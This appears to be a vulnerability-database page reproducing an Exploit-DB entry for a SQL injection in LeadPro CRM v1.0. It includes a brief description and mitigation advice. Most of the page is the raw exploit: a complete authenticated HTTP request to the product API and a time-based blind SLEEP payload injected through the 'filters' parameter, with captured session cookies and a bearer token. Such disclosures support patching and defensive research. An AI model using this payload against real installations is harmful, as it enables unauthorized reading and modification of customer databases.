LeadPro CRM v1.0 - SQL Injection

vendor:

LeadPro CRM

by:

Ahmet Ümit BAYRAM

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: LeadPro CRM

Affected Version From: LeadPro CRM v1.0

Affected Version To: LeadPro CRM v1.0

Patch Exists: NO

Related CWE:

CPE: a:codecanyon:leadifly_lead_call_center_crm:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

LeadPro CRM v1.0 – SQL Injection

The LeadPro CRM v1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries, which could result in unauthorized access to or modification of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and use prepared statements or parameterized queries to prevent SQL Injection attacks. Regularly updating the software to the latest version is also advised.

Source

Exploit-DB raw data:

# Exploit Title: LeadPro CRM v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
# Demo Site: https://demo.leadifly.in
# Tested on: Kali Linux
# CVE: N/A


### Request ###

GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10
HTTP/1.1
Host: localhost
Cookie:
XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;
leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
Authorization: Bearer
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
X-Xsrf-Token:
eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
Referer: https://localhost/admin/product
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close


### Parameter & Payloads ###

Parameter: filters (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name
lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND
(8549=8549&order=id desc&offset=0&limit=10